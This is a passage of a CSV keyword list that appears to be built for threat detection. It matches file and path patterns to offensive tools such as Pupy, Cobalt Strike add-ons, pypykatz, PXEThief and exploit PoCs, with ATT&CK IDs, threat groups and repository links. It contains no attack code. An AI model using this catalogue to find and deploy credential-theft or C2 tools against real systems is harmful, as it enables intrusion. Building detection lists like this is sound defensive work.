TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupy_load.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyCmd.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyCompile.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupylib/payloads/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyOffload.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupyps.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyServer.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyService.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupysh.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyTriggers.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyWeb.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/putter.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/PwnDB.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*/pwndrop.git*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*/pwndrop.ini*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*/Pwned.as*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PwnKit-Exploit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" +"*/pxesploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PXEThief*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*/pxexploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/py_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/py2exe/*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*/pyasn1/*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/pycobalt-*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*/pycobalt/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*/PyExec.git*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*/pyinstaller/*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pykiller/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" +"*/pyLAPS.git*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*/pyLAPS.py*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*/pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/pypykatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/pyrdp.git*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*/pyrdp:latest*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*/Pysoserial.git*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*/pystinger.zip*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*/Python-dynload-os.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pywerview*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*/pywhisker.git*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*/pywsus.git*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"*/pywsus.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/pywsus-master.zip*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a 